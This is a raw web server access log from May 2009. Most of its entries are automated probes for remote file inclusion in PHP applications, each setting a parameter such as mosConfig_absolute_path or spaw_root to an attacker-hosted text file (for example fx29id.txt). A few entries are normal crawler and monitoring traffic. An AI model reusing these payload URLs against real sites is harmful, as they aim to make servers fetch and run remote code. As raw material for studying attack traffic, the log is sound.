77.221.130.4 - - [29/May/2009:01:59:06 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
209.51.141.77 - - [29/May/2009:01:59:56 -0400] "GET /logs/access_log.Q109052100/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
69.94.125.100 - - [29/May/2009:01:59:56 -0400] "GET /logs/access_log.Q109052100/config.php?path_to_root=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
209.51.141.77 - - [29/May/2009:01:59:57 -0400] "GET /logs/access_log.Q109050300/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
69.94.125.100 - - [29/May/2009:01:59:59 -0400] "GET /config.php?path_to_root=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
69.94.125.100 - - [29/May/2009:01:59:59 -0400] "GET /logs/config.php?path_to_root=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
74.54.32.201 - - [29/May/2009:02:00:18 -0400] "GET //errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
74.54.32.201 - - [29/May/2009:02:00:18 -0400] "GET /logs//errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
75.79.13.11 - - [29/May/2009:02:00:31 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
75.79.13.11 - - [29/May/2009:02:00:31 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
75.79.13.11 - - [29/May/2009:02:00:33 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
75.79.13.11 - - [29/May/2009:02:00:33 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
218.150.79.146 - - [29/May/2009:02:01:08 -0400] "GET /logs/error_log.Q108052600////?_SERVER[DOCUMENT_ROOT]=http://www.ghetto.uz/readme.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
218.150.79.146 - - [29/May/2009:02:01:09 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ghetto.uz/readme.txt? HTTP/1.1" 200 3301 "-" "libwww-perl/5.805"
121.165.73.157 - - [29/May/2009:02:01:36 -0400] "GET //errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:02:01:36 -0400] "GET /logs//errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
209.51.141.77 - - [29/May/2009:02:01:44 -0400] "GET //errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
209.51.141.77 - - [29/May/2009:02:01:44 -0400] "GET /logs//errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
66.249.68.74 - - [29/May/2009:02:01:59 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L200C18446DA14300A0DD058+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.34.78.110 - - [29/May/2009:02:02:31 -0400] "GET /errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
195.34.78.110 - - [29/May/2009:02:02:31 -0400] "GET /errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
209.59.12.99 - - [29/May/2009:02:02:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.18.148.82 - - [29/May/2009:02:02:41 -0400] "GET /index.php?meio=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:02:02:41 -0400] "GET /logs/index.php?meio=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:02:03:04 -0400] "GET /logs/access_log.Q109051600//components/com_simpleboard/image_upload.php?sbp=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:02:03:07 -0400] "GET /logs/access_log.Q109050700//components/com_simpleboard/image_upload.php?sbp=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:02:03:27 -0400] "GET /logs/access_log.Q109051600//components/com_simpleboard/image_upload.php?sbp=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:02:03:27 -0400] "GET /logs/access_log.Q109050700//components/com_simpleboard/image_upload.php?sbp=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
220.181.7.97 - - [29/May/2009:02:03:50 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
72.18.148.82 - - [29/May/2009:02:04:06 -0400] "GET /logs/access_log.Q109052300/errors.php?error=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.87.152.58 - - [29/May/2009:02:04:48 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
69.94.125.100 - - [29/May/2009:02:04:56 -0400] "GET /logs/error_log.Q108122800/config.php?path_to_root=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
218.150.79.146 - - [29/May/2009:02:05:11 -0400] "GET /logs/access_log.Q109050700////?_SERVER[DOCUMENT_ROOT]=http://www.ghetto.uz/readme.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
74.208.111.178 - - [29/May/2009:02:05:45 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.208.111.178 - - [29/May/2009:02:05:45 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
70.87.152.58 - - [29/May/2009:02:05:52 -0400] "GET /logs/access_log.Q109051800//skin/zero_vote/ask_password.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 257 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
70.87.152.58 - - [29/May/2009:02:05:52 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 230 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
70.87.152.58 - - [29/May/2009:02:06:34 -0400] "GET /logs/access_log.Q109051800//skin/zero_vote/ask_password.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
70.87.152.58 - - [29/May/2009:02:06:34 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
70.87.152.58 - - [29/May/2009:02:06:34 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
221.139.104.104 - - [29/May/2009:02:07:00 -0400] "GET /errors.php?error=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:02:07:00 -0400] "GET /logs/errors.php?error=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:02:07:13 -0400] "GET /logs/access_log.Q109021500/errors.php?error=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:02:07:13 -0400] "GET /logs/access_log.Q109052100/errors.php?error=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:02:07:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.18.148.82 - - [29/May/2009:02:08:21 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:02:08:21 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:02:08:21 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
70.87.152.58 - - [29/May/2009:02:08:22 -0400] "GET /logs/access_log.Q109052300//skin/zero_vote/ask_password.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
203.151.233.72 - - [29/May/2009:02:08:25 -0400] "GET /errors.php?error=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:08:25 -0400] "GET /logs/errors.php?error=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:08:25 -0400] "GET /logs/access_log.Q108072400%20%20/errors.php?error=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:08:45 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:02:09:30 -0400] "GET /logs/access_log.Q109051000%20%20//modules/vwar/admin/admin.php?vwar_root=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:09:30 -0400] "GET /logs/access_log.Q108072400/errors.php?error=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:09:30 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.87.152.58 - - [29/May/2009:02:09:35 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
121.188.91.69 - - [29/May/2009:02:09:37 -0400] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:02:09:37 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:02:09:37 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:02:09:40 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:02:09:40 -0400] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:02:09:40 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
112.175.141.41 - - [29/May/2009:02:09:45 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:02:09:45 -0400] "GET /logs/access_log.Q109050700/index.php?meio=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
112.175.141.41 - - [29/May/2009:02:09:46 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
112.175.141.41 - - [29/May/2009:02:09:46 -0400] "GET /logs/access_log.Q109051500//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
70.87.152.58 - - [29/May/2009:02:09:54 -0400] "GET /logs/error_log.Q109051200//skin/zero_vote/ask_password.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
70.87.152.58 - - [29/May/2009:02:09:54 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
70.87.152.58 - - [29/May/2009:02:09:55 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
121.188.91.69 - - [29/May/2009:02:10:01 -0400] "GET /logs/error_log.Q108103000%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:02:10:01 -0400] "GET /logs/error_log.Q108103000%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
123.125.64.38 - - [29/May/2009:02:11:22 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
203.151.233.72 - - [29/May/2009:02:11:28 -0400] "GET /logs/errors.php?error=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:11:28 -0400] "GET /logs/access_log.Q108072400%20%20/errors.php?error=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:11:28 -0400] "GET /errors.php?error=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:11:28 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:02:11:36 -0400] "GET //galeria.php?start=0&kategoria=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:02:11:36 -0400] "GET /logs/access_log.Q108121900//galeria.php?start=0&kategoria=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:02:11:36 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:11:47 -0400] "GET /logs/index.php?meio=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:11:47 -0400] "GET /logs/access_log.Q109050700/index.php?meio=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:11:47 -0400] "GET /index.php?meio=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
91.121.106.59 - - [29/May/2009:02:11:50 -0400] "GET /logs/error_log.Q108082200 HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
91.121.106.59 - - [29/May/2009:02:11:50 -0400] "GET /logs/error_log.Q108082600 HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
62.146.68.61 - - [29/May/2009:02:11:54 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:02:11:54 -0400] "GET //galeria.php?start=0&kategoria=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:02:11:54 -0400] "GET /logs/access_log.Q108121900//galeria.php?start=0&kategoria=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:02:11:54 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.54.32.201 - - [29/May/2009:02:11:57 -0400] "GET /errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.54.32.201 - - [29/May/2009:02:11:57 -0400] "GET /logs/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.54.32.201 - - [29/May/2009:02:11:57 -0400] "GET /logs/access_log.Q109050900/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:02:12:10 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:02:12:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.146.68.61 - - [29/May/2009:02:12:38 -0400] "GET /logs/access_log.Q108121900%20%20//galeria.php?start=0&kategoria=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:02:12:38 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:02:12:47 -0400] "GET /logs/access_log.Q108121900%20%20//galeria.php?start=0&kategoria=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:02:12:47 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:02:12:58 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:02:13:09 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:14:37 -0400] "GET /logs/access_log.Q109052300/errors.php?error=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:02:15:43 -0400] "GET /logs/access_log.Q109050300/errors.php?error=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:15:57 -0400] "GET /logs/index.php?meio=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:15:57 -0400] "GET /index.php?meio=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:15:57 -0400] "GET /logs/error_log.Q109050700%20%20/index.php?meio=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:17:15 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:17:15 -0400] "GET /logs/access_log.Q108091400//modules/vwar/admin/admin.php?vwar_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:17:15 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:02:17:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
75.125.245.26 - - [29/May/2009:02:17:35 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 237 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
75.125.245.26 - - [29/May/2009:02:17:35 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
203.151.233.72 - - [29/May/2009:02:18:12 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
220.79.47.122 - - [29/May/2009:02:19:07 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:19:26 -0400] "GET /logs/access_log.Q109051000%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:19:26 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:19:26 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
123.125.64.49 - - [29/May/2009:02:19:49 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.64.51 - - [29/May/2009:02:19:49 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
203.151.233.72 - - [29/May/2009:02:20:14 -0400] "GET /logs/access_log.Q108091400//modules/vwar/admin/admin.php?vwar_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.234.21.12 - - [29/May/2009:02:20:48 -0400] "GET /logs/error_log.Q108052800/index3.php?go=http://controleremoto.net/htmlarea/alb.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
218.234.21.12 - - [29/May/2009:02:20:48 -0400] "GET /index3.php?go=http://controleremoto.net/htmlarea/alb.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
218.234.21.12 - - [29/May/2009:02:20:49 -0400] "GET /logs/index3.php?go=http://controleremoto.net/htmlarea/alb.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
207.213.245.215 - - [29/May/2009:02:21:28 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.65"
207.213.245.215 - - [29/May/2009:02:21:32 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 288 "-" "libwww-perl/5.65"
72.18.148.82 - - [29/May/2009:02:21:41 -0400] "GET /logs//errors.php?error=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:02:21:41 -0400] "GET //errors.php?error=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:02:22:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.134.110.45 - - [29/May/2009:02:23:05 -0400] "GET /logs/error_log.Q108051600//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
201.134.110.45 - - [29/May/2009:02:23:05 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
201.134.110.45 - - [29/May/2009:02:23:05 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
203.151.233.72 - - [29/May/2009:02:25:55 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:25:55 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:25:55 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:02:26:38 -0400] "GET /logs/access_log.Q109050700%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
61.6.163.30 - - [29/May/2009:02:27:03 -0400] "GET /logs/access_log.Q108090300 HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
211.75.91.19 - - [29/May/2009:02:27:05 -0400] "GET /logs/access_log.Q108090300 HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
221.139.104.104 - - [29/May/2009:02:27:18 -0400] "GET ///vwar/backup/errors.php?error=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
